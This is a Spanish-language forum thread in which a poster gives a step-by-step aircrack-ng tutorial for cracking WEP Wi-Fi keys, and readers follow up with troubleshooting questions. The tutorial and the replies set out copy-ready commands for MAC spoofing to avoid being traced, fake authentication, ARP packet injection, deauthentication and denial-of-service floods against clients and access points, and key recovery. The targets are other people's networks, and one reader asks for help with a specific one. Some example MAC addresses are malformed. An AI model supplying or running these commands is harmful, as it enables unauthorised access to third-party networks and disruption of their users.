TUTORIAL CLAVES WEP aircrack (desde cero)

hidden

Wenas peña aquí les dejo un tuto que espero les ayude mucho y para aquellos que tienen linux ya sea ubuntu o cualquier versión pueden conseguir aircrack desde una shell fácilmente:

Abre una ventana de terminal (o consola) y escribe lo siguiente:

apt-get install aircrack-ng

Y para cambiar tu mac necesitas:

apt-get install macchanger

OK pues nada, ahora lo bueno espero que les guste y les ayude mucho,

Voy a ponerlo por pasos porque tendremos que volver para atrás desde el paso nº5 para poner una mac creíble o que ya este asociada con el router.

Paso 1 abre una ventana de terminal y escribe lo siguiente:
airmon-ng

Aquí te va a decir cual es tu tarjeta inalámbrica, lo normal es que salga wlan0, o eth0, o eth1, cosas así por el estilo, tu te vas a dar cuenta de cual es la tuya, en mi caso es la wlan0 así que es la que voy a usar, tu utiliza la tuya ok.

Paso 2 introduce los siguientes comandos:

airmon-ng stop wlan0
ifconfig wlan0 down

Con esto deshabilitas la tarjeta de red inalámbrica para hacerle un cambio de mac, si esta habilitada no te dejara cambiar de mac, cambiaras tu mac por dos razones importantes:
1. Para que así no haya problemas de que te puedan detectar e impedirte futuras conexiones.
2. Con tu mac real pueden llegar hasta ti, tu nombre, tus datos y eso no mola nada.

Paso 3 para cambiar la mac escribe los siguientes comandos:

macchanger --mac 00:11:22:33:44:55 wlan0 (esta mac no es solo un ejemplo sirve)
Lo malo que últimamente da problemas por eso en el paso 5 tendremos que volver al paso 2 y seguir de nuevo

Paso 4 habilita tu tarjeta:

airmon-ng start wlan0

Con el paso 3 se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55
y con el paso 4 habilitaste nuevamente tu tarjeta de red inalámbrica

Paso 5 ahora vas a proceder a ver las redes inalámbricas que están a tu alcance con el siguiente comando:

airodump-ng wlan0

Va a salir la lista de las redes inalámbricas, donde dice el BSSID (mac del router que da la señal), PWR (Poder de señal cuanto mas bajo mejor ej: -10 es mas furte que -80), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que tiene la red, este tutorial es solo para WEP) ESSID (Nombre de la red inalambrica) STATION ( es la mac del pc que esta conectado al router)
Se que son mas datos los que se muestran, pero esos no son de importancia, solo vamos a utilizar los que mencione.

Cuando selecciones la red inalámbrica que vamos a atacar aprieta Ctrl + C para parar el proceso y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar y lo pegamos en un documento de texto y hacemos lo mismo con la station y volvemos al paso 2.

Para explicar bien esta parte vamos a poner un ejemplo:

STATION 00:11:22:33:44:55
BSSID 66:77:88:99:00:11
CHN 6
ESSID JAZZTEL_70 o la que sea estos datos son los que usaremos, en este punto copiamos la station que es la mac del pc asociada ya con ese router y volvemos al paso 2 para cambiar nuestra mac por esta que es la que funciona seguro,

Paso 6 ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando:

airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0
Donde:

-c es el numero del canal de la red que estamos atacando
-w es el archivo donde se van a guardar los paquetes que captures (por defecto están en la dirección /root)
--bssid es la mac del router de la red que estamos atacando
wlan0 es nuestra tarjeta inalámbrica
STATION es la mac del pc que esta conectado al bssid esta mac es la que hay que usar para asociar 100%

Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados o no, si no captura paquetes DATA es que no hay ningun pc conectado al ruoter para poder descifrar una clave wep es necesario 20,000 paquetes o mas.
Si no esta generando trafico y te podría llevar días incluso semanas llegar a los 20,000 paquetes,

Pero no te preocupes que ahora te enseñare como generar tráfico en la red.

Paso 7 para asociarte abre otra terminal (consola) donde introducirás los siguientes comandos:

aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0

Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica
-e es el nombre de la red que estamos atacando

Luego cuando salgan 4 líneas de códigos y te diga que la conexión esta succesfull, esto significa que estas conectado en capa 2 al router de la red que estamos atacando.
Si por alguna razón no se puede conectar (unsuccesfull) algunas de las razones son las siguientes:

-La red a la que quieres atacar esta muy lejos, aconsejo que tengas mínimo de tres rallas de señal.
-Tu tarjeta de red no puede hacer inyección de paquetes.
-El router tiene seguridad para evitar este tipo de ataques.

Paso 8 ahora para inyectarle el trafico introduce el siguientes comando:

aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0

Donde:
-b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica

Veras que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te darás cuenta que la DATA va caminando muy rápido.

Paso 9 ahora abre otra terminal (consola) aquí es donde vamos a ejecutar el ataque final que es utilizar los datos capturados para buscar la contraseña e introduce los siguientes comandos código:

aircrack-ng prueba-01.cap

Y también puedes usar este que une todos los paquetes, código:

aircrack-ng *.cap

EJ: -01.cap, -02.cap, -03.cap esto es por si dejas el ataque para otro momento o si en el paso de inyectar le diste a ctrl.+c y vuelves a intentarlo ya no te crea el -01.cap te creara el -02.cap así los juntas y no pierdes ese paquete)

Donde:
-Prueba-01.cap es el archivo donde se están capturando los datos
Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contraseña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:

Key found [XX:XX:XX:XX:XX:XX]

Donde las XX son las letras o números de la contraseña, por ejemplo:
Si te muestra [12:34:56:78:90]

La contraseña para esa red inalámbrica seria 1234567890.

Bueno para aquellos que quieren probar aquí les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:

Paso 1 # airmon-ng
Paso 2 # airmon-ng stop wlan0
# ifconfig wlan0 down
paso3 # macchanger –mac 00:11:22:33:44:55 wlan0
paso 4 # airmon-ng start wlan0
paso 5 # airodump-ng wlan0 ( aquí cogeremos la estation del bssid que atacamos y volvemos al paso 2 si no hay ninguna station con nuestra bssid cogemos la que sea porque por lo menos sera real y dará menos problemas.
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap

Como se darán cuenta son pocos comandos pero llevan mucha explicación y lo trate de hacer de una forma entendible

Para aquellos que quieren probar otras formas de inyección aquí les dejo otras dos formas que me han funcionado perfecto.

Forma 2:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando

Forma 3:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -5 -b <BSSID> -h <mac> wlan0
Ver como se llama el archivo .xor
# packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y <archivo .xor> -w ARP
# aireplay-ng -2 -r ARP wlan0

Solo aclarar que este tuto es para novatos, por lo que para alguien con algo de experiencia no tiene que pasar del paso 5 al 2 y seguir Bastaría con saltarse algunos pasos EJ:

airmon-ng start wlan0

airodump-ng wlan0 escogemos la mac y la station pulsamos ctrl+c para parar todo las copiamos y recordamos el canal CH ej: 3,

airmon-ng stop wlan0
ifconfig wlano down
macchanger –mac 0B:A1:89:10:26:B0 wlan0

airodump-ng wlan0 –c 3 (como ves ahora si que he puesto el canal para eliminar distracciones y centrarnos en la victima)

airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0

aireplay-ng -1 0 -a (bssid) -h 0B:A1:89:10:26:B0 -e (essid) wlan0

aireplay-ng -3 -b (bssid) -h 0B:A1:89:10:26:B0 wlan0

aircrack-ng nombredelarchivo.cap

subaru_74

Hola hidden, mira he seguido tu manual, la verdad que esta muy bine explicado, pero tengo una duda "curiosas" cuando lanzo el airodump detecto un AP en el canal 138???? y cuando me intento asociar me genera DATAS y BEACONS asi que no creo que sea un error..... ademas en el ESSID me pone: <length: 0>???

te pongo una foto para que lo veas y si me puedes hechar una mano, un saludo y gracias.

hidden

Te dejo algo de información supongo que es lo que preguntas porque no tengo claro cual es tu duda.

ESSID También llamado “SSID”, que puede estar en blanco si la ocultación del SSID está activada en el AP. En este caso, airodump-ng intentará averiguar el SSID analizando paquetes “probe responses” y “association requests” (son paquetes enviados desde un cliente al AP).
El ESSID Algunas veces está oculto

puedes probar a descifrarlo con:

codigo:

aireplay-ng -0 10 -a BSSID -c STATION INTERFAZ

Prueba lanzando un A0 sin especificar cliente a ver si salta la liebre:

Código:

aireplay-ng -0 10 -a BSSID wlan0

suerte!!

canutet

hola, he seguito el tutorial paso a paso y to bien hasta el momento de inyectar paquetes , no hay manera de hacerlo seguro que estoy haciendo algo mal, estoy utilizando este adaptador usb CompraWifi-GOLD USB REDUCIDO 500mW + Antena RP-SMA 5dbi + Modo monitor (Chipset Realtek 8187L) y cuando llego a la parte de:
Para inyectarle trafico a la red abre otra terminal (consola) donde introduciras los siguientes comandos:
aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0
Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
-e es el nombre de la red que estamos atacando

salen las cuatro lineas un puñao de rato y luego me sale el error de que no se puede conectar, a ver si me puedes ayudar gracias de antemano.


a una cosa muy bueno el tutorial

hidden

Lo mas seguro es que no te puedes asociar razones hay muchas tienes que hacer una buena identificación con el AP.

A muchos de vosotros os habrá pasado, o si no os ha pasado os aseguro que os pasará, que queréis crackear una red inalámbrica y no hay clientes conectados. El hecho de que haya un cliente conectado a la red objetivo facilita mucho, pero que mucho la tarea. Desgraciádamente, no siempre es así y para ello tenemos que hacer uso de tretas y de nuestro ingenio (bueno, aquí el ingenio lo pone el programa, para poder iniciar el ataque sin clientes asociados.

Aireplay-ng implementa un tipo de ataque llamado "Autenticación falsa" que como estaréis suponiendo, nos viene de perlas en casos como este . Lo que vamos a hacer por medio de este ataque es hacernos pasar por un falso cliente. Para ello, es recomendable que fakeemos nuestra MAC. Esto se puede hacer de varios modos.

Modo 1:Por medio del "macchanger" (consola):

Código:


airmon-ng stop wlan0

ifconfig wlan0 down



Para cambiar la mac escribe los sigueintes comandos:


macchanger --mac 00:11:22:33:44:55 wlan0

airmon-ng start wlan0

Modo 2: Por medio de "ifconfig" (consola):

Código:

ifconfig interfaz down
ifconfig interfaz hw ether 00:11:22:33:44:55
ifconfig interfaz up

Una vez hemos cambiado fakeado nuestra mac, procedemos a autenticarnos como falso cliente. La sintaxis del comando será la siguiente:

Código:

aireplay-ng -1 N -e "ESSID" -a XX:XX:XX:XX:XX:XX -h FF:FF:FF:FF:FF:FF interfaz


Paso a explicar la sintaxis:

-1= Con esto indicamos que vamos a hacer el ataque 1 o "Autenticación falsa".
N= Es un número. Con él indicamos el intervalo de tiempo con el que queremos asociarnos a nuestro AP. Por ejemplo, si queremos asociarnos cada 10 segundos, mandará un paquete de asociación falsa cada 10 segundos.
-e= "ESSID": Aquí estamos indicando el nombre del AP al que queremos asociarnos como falsos clientes, eso sí, ¡¡¡las comillas NO se ponen!!!
-a XX:XX:XX:XX:XX:XX= Aquí indicaremos el BSSID, es decir, la MAC del atacada.
-h FF:FF:FF:FF:FF:FF= Aquí indicamos al MAC fakeada por nosotros mismos. En nuestro caso "00:11:22:33:44:55".
interfaz= Vuestra interfaz en mi caso wlan0

ASPECTOS A TENER EN CUENTA:

1.-Este ataque no siempre es eficaz. Existen routers con los que no funciona. De hecho hay routers que requieren autenticación cada X periodo de tiempo... el problema está en saber qué periodo de tiempo es el que tienen configurado. Por normal general, son 30 segundos.

2.- Para que este ataque funcione hay que tener activo el airodump-ng. ¿Por qué? Pues porque, el airodump-ng es el encargado de la captura de paquetes y para que este ataque se inicie necesitaremos un Beacon. ¿Qué es un Beacon? es un paquete saludo que envía el AP para decirnos: "Eh! que estoy aquí!"

3.- Tenemos que configurar la tarjeta para el mismo canal del AP. ¿Cómo? Pues no sé si lo recordaréis... ¡con el airmon-ng!

Código:

airmon-ng start interfaz canal

Este ataque por si sólo no consigue nada. Tenemos que combinarlo con el ataque 3 o con el ataque 4

CAUSAS DE UN POSIBLE FRACASO:

1.- El router tiene filtrado de MACs.
2.- Estás demasiado cerca o demasiado lejos del AP.
3.- Tu controlador no está correctamente parcheado e instalado (con las live-cd's como Wifislax, Wifiway o Backtrack no os pasará ya que traen los drivers instalados y parcheados).
4.- La tarjeta no está configurada en el mismo canal que el AP.
5.- Hemos introducido mal el BSSID o/y el ESSID.

El aireplay es el programa que va a inyectar paquetes 802.11. Aireplay-ng implementa 6 ataques diferentes:

-Ataque 0: Ataque de deautenticación.
-Ataque 1: Ataque de autenticación falsa.
-Ataque 2: Reenvío interactivo de paquetes.
-Ataque 3: Reinyección de petición ARP
-Ataque 4: Ataque "chopchop" de Korek.
-Ataque 5: Ataque de framentación

El ataque 0 de deautenticación, tiene como objetivo, deautenticar al cliente conectado al AP. La sintaxis de este ataque es la siguiente:

Código:

aireplay-ng -0 N -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY interfaz


Paso a explicar lo que hemos puesto:

-0: Indica que vamos a hacer el ataque "0" o de deautenticación de cliente.
N: Es un número. Con él indicaremos cuantos paquetes de deautenticación enviaremos.
-a XX:XX:XX:XX:XX:XX: "-a" indica el AP y XX:XX:XX:XX:XX:XX es el BSSID o la dirección MAC del AP.
-c YY:YY:YY:YY:YY:YY: "-c" indica al cliente y YY:YY:YY:YY:YY:YY es la MAC del cliente asociado al AP.
interfaz: es la interfaz de nuestra tarjeta. Para saberla recordad el (iwconfig).

Ataque DoS (Denegación de Servicio):

Muchos de vosotros ya sabéis lo que es un ataque de Denegación de Servicio. De lo que estoy seguro, es de que muchos de vosotros ni siquiera sabíais que se podían hacer ataques DoS a clientes asociados a puntos de acceso (AP). Pongamos un BSSID (00:89:4F2:15:A3), un cliente asociado con MAC (00:148:7F:B1:96) y una tarjeta con chipset Zydas. El ataque sería así:

Código:

aireplay-ng -0 0 -a 00:89:4F:M2:15:A3 -c 00:148:7F:M1:96 eth1


Lo que estaríamos haciendo es crear un bucle infinito de paquetes de deautenticación, con lo que impediríamos el cliente conectarse al AP. También podemos hacer un DoS generalizado, de tal forma que solo ataquemos al AP. Con esto impediríamos la conexión a todos los clientes que quisieran asociarse al AP. Esto se haría mediante el siguiente comando:

Código:

aireplay-ng -0 0 -a 00:89:4F:M2:15:A3 eth1


Como véis, sólo hemos puesto la MAC del router. Esto impediría conectarse a cualquiera.

--------Generación de peticiones ARP---------

Muchas veces, al realizar el ataque 3(lo veremos mas adelante) vemos que las peticiones ARP no arrancan, es decir, se quedan a 0. Lo que tenemos que hacer entonces es generar peticiones ARP. Para ello, primero ejecutaremos el ataque 3, como lo habríamos hecho de forma normal.

aireplay-ng -3 -b 00:89:4F:M2:15:A3 -h 00:148:7F:M1:96 eth1

Entonces lo que tendríamos que hacer es provocar esa petición ARP. Para ello haríamos un DoS en una consola a parte y esperaríamos a que se generase la primera petición ARP. Una vez se hubiese generado la primera, iríamos a la consola que está realizando el ataque DoS y pulsaríamos Ctrl+C para pararlo. Ahora iríamos a la consola que está realizando el ataque 3 y veríamos como las peticiones ARP están subiendo a toda leche. La mayoría de la gente no hace este ataque así, si no que se dedica a poner un valor númerico en el ataque de deautenticación, generando un así un número de paquetes de deautenticación directamente proporcional al estipulado. El contra de esta técnica es que muchas veces con unos pocos paquetes de deautenticación no conseguimos nada, lo que tenemos que hacer es enviar unos cuantos hasta que veamos que obtenemos la primera petición ARP.

ATAQUE 3: REINYECCIÓN DE PETICIONES ARP

Este ataque es un clásico y sin lugar a dudas, es el modo más efectivo de generar nuevos vectores de inicialización (IV's). El ataque de reenvío de peticiones ARP, o ARP request, funciona poniéndo aireplay-ng a la escucha de un paquete ARP y enviándolo de nuevo al AP. Esto va a tener como consecuencia que el punto de acceso tenga que volver a enviar un paquete ARP pero esta vez, con un vector de inicialización nuevo. Muchos diréis: ¿Y eso de que nos sirve? Pues ya que estoy, voy a aprovechar para hablar un poco sobre los IV's (vectores de inicialización).

Las claves con cifrado WEP utilizan un algoritmo de encriptación llamado RC4 de 64 bits (bueno, eso inicialmente, ahora podemos encontar de 128 y de 256). La forma en la que está compuestos estos 64 bits es la siguiente:

1.- 24 bits correspondientes a un vector de inicialización (IV)
2.- 40 bits correspondientes a la contraseña.

El vector de inicialización se genera de forma dinámica y varía para cada trama. Lo que se pretende con los vectores de inicialización es cifrar los paquetes con claves diferentes para que una tercera persona con malas intenciones (¿nosotros? no, solo testeamos nuestra red wifi ja ja) no acabe deduciendo la clave. Con un solo paquete, las posibilidades de hallar la clave, si mal no recuerdo, son de 1/17.000.000. Eso supone años y que el pc se te estropée si te pasas de tiempo con el aircrack. Por esta misma razón,cuantos más IV's distintos, más posibilidades tendremos de desencriptar la clave!

En cuanto al protocolo ARP, o Adress Resolution Protocol, debéis saber que es un protocolo que tiene como función localizar direcciones MAC y hacer que éstas correspondan con una dirección IP. Las peticiones ARP,se enviarán a la dirección FF:FF:FF:FF:FF:FF, esperando una respuesta con la dirección MAC que corresponda.

Vamos a proceder ahora a explicar la sintaxis de este ataque:

Código:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY interfaz


De aquí:
-3= Estamos diciendo a aireplay que vamos a comenzar el ataque 3 (reenvío de peticiones ARP).
-b XX:XX:XX:XX:XX:XX= Esto es la dirección MAC del AP o BSSID.
-h YY:YY:YY:YY:YY:YY= Esto es la dirección MAC del cliente asociado al AP. Aquí podríamos poner un cliente real o un cliente falso (recordad el ataque -1.
interfaz= Es el nombre de tu interfaz wifi.

Con este ataque, del mismo modo que en el ataque -2 (reenvío de paquetes interactivo) podemos seleccionar una ARP anteriormente guardada. Lo haríamos de la siguiente manera:

Código:

aireplay-ng -2 -r nombredearchivo.cap -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 interfaz


Traduciendo:

-2= significa que estamos haciendo el ataque -2 (reenvío interactivo de paquetes)
-a= BSSID
-h= Nuestra MAC (fakeada a poder ser)
-r nombredelarchivo.cap= Con esto indicamos el nombre del paquete ARP a enviar.
interfaz= Tu interfaz wifi.

Como ya he dicho antes, este ataque puede ser usado de 3 maneras:

1.- Con cliente asociado:

Lo que haremos aquí será, utilizar un cliente que esté conectado al AP y captar una petición ARP para después reenviarla. Sin duda, de los tres, es el más efectivo. Esto lo haríamos así:

Código:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY interfaz



Así el sistema responderá con:

Código:

Saving ARP requests in archivo.cap
You should also start airodump-ng to capture replies.
Read 42 packets (got 0 ARP requests), sent 0 packets...

No olvidéis que si no os captura ninguna ARP, podéis tirar de un ataque DoS para así desautenticar al cliente asociado y que vuelva a haber una petición ARP.

Ataque Con cliente falso asociado:

Aquí vamos a conjugar dos ataques, el -3 para capturar la petición ARP y el -1 para crear un cliente falso (no olvidéis fakear la MAC). El ataque sería el siguiente:

Por un lado escribiríamos en una consola el siguiente comando:

Código:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY interfaz


Donde YY:YY:YY:YY:YY:YY sería nuestra MAC fakeada (00:11:22:33:44:55).

Por otro lado escribiríamos:

Código:

aireplay-ng -1 N -e ESSID -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY interfaz


Donde YY:YY:YY:YY:YY:YY también sería nuestra MAC fakeada.

bueno socio no se si todo esto ayuda o te he liado aun mas jajajajaja espero que te sirva de algo!!!

canutet

lo probare pero me has liado bastante jajaja

canutet

imposible tronco

canutet

si me podrias detallar paso a paso,

te lo agraderia mucho la red que quiero crackear esta en el canal 11

canutet

una cosa conoces wepbuster

Chocolate

A mi no me deja instalar el paquete macchanger
xxxx@ubuntu:~$ sudo apt-get install macchanger
[sudo] password for xxxx:
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias
Leyendo la información de estado... Hecho
E: No se pudo encontrar el paquete macchanger


Que deberia hacer? El aircrack lo tengo instalado. Gracias.
Tengo instalada la ultima version de ubuntu